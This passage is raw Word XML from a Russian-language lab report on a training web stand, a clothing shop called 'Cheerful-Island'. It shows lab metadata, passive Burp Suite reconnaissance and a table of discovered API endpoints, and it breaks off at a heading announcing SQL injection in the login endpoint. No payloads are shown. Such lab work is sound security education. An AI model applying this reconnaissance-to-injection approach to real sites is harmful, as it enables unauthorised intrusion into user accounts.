      <w:tr w:rsidR="00C2601B" w14:paraId="773777D4" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56036E2C" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CA669D8" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="16CBADED" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25FD0397" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Название лабораторной</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="767F9031" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Cheerful</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>-Island</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="4954DF6B" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EDC15F8" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>UUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C439FC2" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>281597ea-a798-410d-9e81-43bb6b4ce978</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="6D367C3F" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="580BF525" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Тип сайта</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DC86E25" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>магазин одежды</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="3714DCF7" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E4971EC" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Создана</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42A46072" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>06.05.2026 18:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="65A064F9" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="366DCA9F" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Запущена</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D02F5E7" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>06.05.2026 18:08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="69DA71DB" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="554E9E4A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">API </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>prefix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6867" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="441B640F" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>/away/281597ea-a798-410d-9e81-43bb6b4ce978/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C4ED9AA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7801394E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6973F1B5" wp14:editId="200CAF0E">
            <wp:extent cx="5220000" cy="2395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2_Cheerful_Island.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5220000" cy="2395961"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62004A90" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 2 – Карточка созданной лабораторной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cheerful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-Island</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40395F70" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A4810F" wp14:editId="3EF7CF2D">
            <wp:extent cx="5832000" cy="2950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3_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="2950306"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F1F74" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 3 – Главная страница стенда: магазин одежды</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336A832" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">На первом этапе была выполнена пассивная разведка приложения через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suite. По HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> были определены основные API-ручки, которые использовались </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-приложением.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF2DCD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Таблица 9 – Найденные API-ручки</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3515"/>
        <w:gridCol w:w="6380"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="56167410" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26ECEEB0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Endpoint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A8D9EEA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Назначение / наблюдение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="50BC9723" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="366F69B9"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products</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B37A4DD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>получение каталога товаров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="7713D9F6" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DFF066F"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categories</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BA6BFAA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>получение списка категорий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="3F4F7E0E" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F9DA049"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products?category</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>=...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D1AFC57" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>фильтрация товаров по категории</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="346F6426" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67A3C104" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10309FCE" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>авторизация пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="74F66E4F" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3061D621"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orders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34607F0A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>получение заказов авторизованного пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="04A2DB84" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CF2B813"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profile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="768C6F9D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>получение профиля пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="1C337A64" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76CC05A1"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profile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>favorites</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C00F7EA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>получение избранных товаров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="21B64B50" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DEB1282"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profile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>reviews</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6380" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E3210AB" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>получение отзывов пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13781139" w14:textId="77777777" w:rsidR="003668B4" w:rsidRPr="003668B4" w:rsidRDefault="003668B4" w:rsidP="007A62FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341EF112" w14:textId="2E5A7989" w:rsidR="00E014B6" w:rsidRDefault="00C2601B" w:rsidP="00E014B6">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve"> в ручке авторизации /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>/</w:t>
      </w:r>
